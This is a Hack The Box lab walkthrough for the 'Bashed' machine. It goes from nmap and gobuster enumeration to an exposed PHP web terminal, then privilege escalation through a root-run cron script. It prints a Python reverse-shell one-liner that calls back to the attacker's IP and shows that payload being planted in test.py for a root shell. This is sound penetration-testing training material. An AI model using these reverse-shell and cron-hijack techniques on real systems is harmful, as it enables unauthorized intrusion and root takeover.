Hack The Box Walkthrough: Bashed

Abhijith Kumar
3 min readMar 20, 2023

--

In this post, we will go through the HTB machine called Bashed.

Run nmap on the target.

sudo nmap -sV -sC -oA nmap/bashed 10.10.10.68

Starting Nmap 7.93 ( https://nmap.org ) at 2023–03–13 10:41 EDT
Nmap scan report for 10.10.10.68
Host is up (0.15s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel’s Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.12 seconds

On navigating to the website we get the following page.

On clicking the button, we are taken to /single.html, where the link to github repository is given. Lets clone the repository in our local system.

I didn’t find anything that I can possibly exploit except that the code itself is meant to execute commands in the target. Our next step would be to find where the phpbash.php is located.

For this you can run any directory enumeration tool. I personally use gobuster for this.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 10.10.10.68 | tee directories.txt

The output shows a route to /dev. We can see that there is a while called phpbash.php and on clicking that we get to the online terminal.

To get the user flag type:

cat /home/arrexel/user.txt

It would be convenient to get a reverse shell at this point. Go to revshells.com and enter your local IP and port at which you want the connection to be made. Choose the language as python.

We get the following payload that we have to enter in the target machine.

python3 -c ‘import os,pty,socket;s=socket.socket();s.connect((“[YOUR_IP_ADDRESS]”,4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(“/bin/sh”)’

Make sure that you have netcat listening on 4444 in your local machine.

Once we get the shell, we should modify it to make it interactive.

python -c ‘import pty; pty.spawn(“/bin/bash”);’

Press Ctrl+Z to suspend and enter the commands in sequence.

stty -echo raw

fg

export TERM=screen

stty rows 54 columns 134

Once we get the interactive shell, type ‘sudo -l’.

We can run commands as scriptmanager user. If you go to /, you will see a folder called script. On trying to list the content we are unable to see anything inside. Trying the ‘ ls -dl /scripts’ command tells us that the scriptmanager user owns the file.

Enter the following command to view the content of /scripts:

sudo -u scriptmanager ls /scripts

The folder has two files called test.py and test.txt. We can view the content of test.py.

sudo -u scriptmanager cat /scripts/test.py
f = open(“test.txt”, “w”)
f.write(“testing 123!”)
f.close

We can see that test.py is used to write “testing 123!” in test.txt. If you see the timestamp next to test.txt when using the ls command you can see that the changes are much recent than the test.py file and the owner of test.txt is root. From this we can assume that maybe there is a cronjob run by root user that is executing test.py after a set time.

We can comment out all the code in test.py and add the python3 reverse shell payload that we got from revshells.com. Make sure to not use 4444 as it is already in use.

Once you add the payload in test.py and start netcat on your local machine, you will get root shell in a minute or two. The root flag will be located under /root/root.txt.

--

--